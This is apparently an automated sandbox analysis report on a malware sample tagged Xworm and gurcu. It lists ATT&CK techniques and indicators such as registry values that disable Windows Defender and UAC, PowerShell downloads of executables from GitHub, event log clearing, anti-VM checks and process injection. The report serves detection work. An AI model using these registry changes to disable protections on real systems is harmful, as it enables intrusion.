gurcu | a32aab9ec5b65cb24c9bec2cef92239ea0d27937123d2569b95530101e1c3459

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 8 IoCs

flow	pid	Process
25	5508	powershell.exe
28	5508	powershell.exe
30	5816	powershell.exe
32	5816	powershell.exe
35	5388	powershell.exe
36	5388	powershell.exe
39	3488	powershell.exe
40	3488	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
5508	powershell.exe
5816	powershell.exe
5388	powershell.exe
3488	powershell.exe
536	powershell.exe
4980	powershell.exe
4884	powershell.exe
3396	powershell.exe
4660	powershell.exe
3452	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 4 IoCs

flow	pid	Process
28	5508	powershell.exe
32	5816	powershell.exe
36	5388	powershell.exe
40	3488	powershell.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 5 IoCs

pid	Process
5176	Launcher.exe
2648	start.exe
3528	explorer.exe
4464	explorerS.exe
1800	explorer.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
27	raw.githubusercontent.com
28	raw.githubusercontent.com
32	raw.githubusercontent.com
36	raw.githubusercontent.com
40	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
42	ip-api.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1944	powercfg.exe
5236	powercfg.exe
2072	powercfg.exe
4652	powercfg.exe
1816	powercfg.exe
5248	powercfg.exe
1568	powercfg.exe
368	powercfg.exe

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\MRT.exe	explorerS.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	explorer.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4464 set thread context of 3712	4464	explorerS.exe	256
PID 1800 set thread context of 4060	1800	explorer.exe	289
PID 1800 set thread context of 3704	1800	explorer.exe	291
PID 1800 set thread context of 5488	1800	explorer.exe	295

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	start.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\load-hub-i18n.bundle.js	msedge.exe
File created	C:\Program Files\msedge_url_fetcher_4164_623211769\84d3e481-77df-49da-bc37-0a994069ddb9	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\lo\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\iw\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\es\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\sk\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-hr.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-shared-components\id\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\uk\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\en_CA\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-lv.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-mobile-hub\es\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\128.png	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_286652685\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-gu.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-ec\pt-BR\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-ec\zh-Hans\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\de\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\pl\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\pt-BR\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\pt_BR\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\en\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\az\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-mr.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-sl.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-notification-shared\fr\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-notification-shared\it\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-tokenized-card\pt-BR\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\el\messages.json	msedge.exe
File created	C:\Program Files\msedge_url_fetcher_4164_1544650857\bf8090eb-6e5c-4c51-9250-5bf9b46cf160	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_2081323541\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1071498887\_metadata\verified_contents.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-bn.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_94072451\Filtering Rules-CA	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_98857137\shopping.html	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-shared-components\hu\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\gl\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_94072451\Part-FR	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-mobile-hub\de\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\wallet\wallet-notification-config.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\Mini-Wallet\miniwallet.bundle.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_568815681\_platform_specific\win_x64\widevinecdm.dll	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\af\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\fil\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\is\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-gl.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_94072451\Part-NL	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\es\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_568815681\LICENSE	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\et\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\_locales\sv\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-hub\zh-Hans\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-mobile-hub\fr\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-notification\el\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-notification\sv\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-shared-components\cs\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1550835607\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-pa.hyb	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1803587842\json\i18n-mobile-hub\id\strings.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_2126383388\regex_patterns.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_286652685\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping4164_1081229611\hyph-nn.hyb	msedge.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Launches sc.exe 52 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1816	sc.exe
5828	sc.exe
1384	sc.exe
5628	sc.exe
1732	sc.exe
4600	sc.exe
2004	sc.exe
4672	sc.exe
2804	sc.exe
904	sc.exe
5568	sc.exe
4504	sc.exe
2812	sc.exe
5796	sc.exe
4476	sc.exe
412	sc.exe
5504	sc.exe
5708	sc.exe
4948	sc.exe
1780	sc.exe
4284	sc.exe
1908	sc.exe
4164	sc.exe
1696	sc.exe
2980	sc.exe
4316	sc.exe
3660	sc.exe
1596	sc.exe
3044	sc.exe
888	sc.exe
2212	sc.exe
2604	sc.exe
5684	sc.exe
3044	sc.exe
2836	sc.exe
1396	sc.exe
4908	sc.exe
1472	sc.exe
5196	sc.exe
4824	sc.exe
3956	sc.exe
4320	sc.exe
6040	sc.exe
4896	sc.exe
1756	sc.exe
5788	sc.exe
3776	sc.exe
3216	sc.exe
1176	sc.exe
3472	sc.exe
1340	sc.exe
1992	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Launcher.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3516	PING.EXE
6056	PING.EXE
4864	PING.EXE

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Kills process with taskkill 45 IoCs

pid	Process
2856	taskkill.exe
5404	taskkill.exe
2460	taskkill.exe
6076	taskkill.exe
1500	taskkill.exe
4812	taskkill.exe
5664	taskkill.exe
2052	taskkill.exe
5284	taskkill.exe
1020	taskkill.exe
6016	taskkill.exe
5652	taskkill.exe
3620	taskkill.exe
5720	taskkill.exe
116	taskkill.exe
2176	taskkill.exe
5216	taskkill.exe
5096	taskkill.exe
344	taskkill.exe
4552	taskkill.exe
1468	taskkill.exe
5456	taskkill.exe
2784	taskkill.exe
3420	taskkill.exe
4660	taskkill.exe
3920	taskkill.exe
5116	taskkill.exe
4156	taskkill.exe
3112	taskkill.exe
2960	taskkill.exe
4404	taskkill.exe
5492	taskkill.exe
3300	taskkill.exe
2192	taskkill.exe
4764	taskkill.exe
5876	taskkill.exe
2564	taskkill.exe
4804	taskkill.exe
2288	taskkill.exe
4656	taskkill.exe
2236	taskkill.exe
5768	taskkill.exe
5764	taskkill.exe
5956	taskkill.exe
5488	taskkill.exe

Modifies data under HKEY_USERS 62 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1743775129"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 04 Apr 2025 13:58:50 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133882486767652868"	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
